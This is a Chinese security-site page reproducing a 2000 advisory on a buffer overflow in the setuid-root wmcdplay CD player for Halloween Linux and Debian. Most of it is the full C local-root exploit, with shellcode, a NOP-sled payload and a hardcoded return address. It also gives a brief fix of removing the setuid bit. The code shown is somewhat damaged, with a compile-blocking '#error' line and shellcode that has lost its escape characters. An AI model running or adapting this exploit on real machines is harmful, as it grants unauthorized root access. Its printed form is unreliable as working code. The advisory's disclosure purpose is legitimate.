Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Linux wmcdplay 缓冲区溢出漏洞

受影响系统: Sam Hawker wmcdplay 1.0 beta1-2 - Halloween Linux 4.0 - Debian Linux 2.1 描述: wmcdplay是unix系统下的常用的一个cd播放器,它通常在WindowMaker X11 窗口管理程序中被使用。它通常不是被缺省安装的。如果手工安装它,它会被设置setuid root属性。由于对输入的一个参数没有做边界检查,导致一个缓冲区溢出的漏洞发生。本地用户可用来获得root权限。 <* 来源: krahmer TESO advisory -- http://teso.scene.at *> 测试方法: 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! /*** Halloween 4 local root exploit for wmcdplay. Other distros are *** maybe affected as well. *** (C) 2000 by C-skills development. Under the GPL. *** *** Bugdiscovery + exploit by S. Krahmer & Stealth. *** *** This exploit was made (possible by|for) the team TESO and CyberPsychotic, the *** OpenBSD-freak. :-) Greets to all our friends. You know who you are. *** *** *** !!! FOR EDUCATIONAL PURPOSES ONLY !!! *** *** other advisories and kewl stuff at: *** http://www.cs.uni-potsdam.de/homepages/students/linuxer *** ***/ #include /* The shellcode can"t contain "/" as wmcdplay will exit then. * So i used Stealth"s INCREDIBLE hellkit to generate these code! :-) */ char shell[] = "xebx03x5exebx05xe8xf8xffxffxffx83xc6x0dx31xc9xb1x68x80x36x01x46xe2xfa" "xeax09x2ex63x68x6fx2ex72x69x01x80xedx66x2ax01x01" "x54x88xe4x82xedx1dx56x57x52xe9x01x01x01x01x5ax80xc2xbbx11" "x01x01x8cxbax2bxeexfexfex30xd3xc6x44xfdx01x01x01x01x88x7c" "xf9xb9x16x01x01x01x88xd7x52x88xf2xccx81x8cx4cxf9xb9x0ax01" "x01x01x88xffx52x88xf2xccx81x5ax5fx5ex88xedx5cxc2x91x91x91" "x91x91x91x91x91x91x91x91x91x91x91x91"; /* filename-buffer plus ret + ebp - defaultpath */ #define buflen (256+8 - 28) #error "no kids please" int main(int argc, char **argv)
{ char *wm[] = { "/usr/X11R6/bin/wmcdplay", "-f", "-display", "0:0", /* one might comment this if already running on X; remotely you can * give your own server */ 0 }; char boom[buflen+10]; int i = 0, j = 0, ret = 0xbffff796; /* this address works for me */ memset(boom, 0, sizeof(boom)); memset(boom, 0x90, buflen); if (argc > 1) ret += atoi(argv[1]); else printf("You can also add an offset to the commandline. 40 worked for me on the console. "); for (i = buflen-strlen(shell)-4; i < buflen-4; i++) boom[i] = shell[j++]; *(long*)(&boom[i]) = ret; printf("Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer " "Respect other users privacy! "); execl(wm[0], wm[0], wm[1], boom, wm[2], wm[3], 0); return 0; } 建议: 临时解决办法: chmod u-s /usr/X11R6/bin/wmcdplayLinux atsadc 输入文件检查漏洞Oracle 8.1.5 For Linux安装漏洞相关资讯      Linux漏洞 
  • 敲击28次退格键之后:Linux漏洞可  (12/18/2015 11:22:28)
  • Linux出现重大漏洞 GHOST ?  (01/30/2015 18:35:07)
  • Linux 2.6.31本地代码执行漏洞(  (07/07/2014 07:51:17)
  • Red Hat Linux 修补“libuser”库  (07/26/2015 06:39:34)
  • 红帽反驳:“Grinch(鬼精灵)”算  (12/30/2014 07:38:23)
  • Linux gcc++漏洞:普通用户获得  (08/16/2013 11:57:41)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图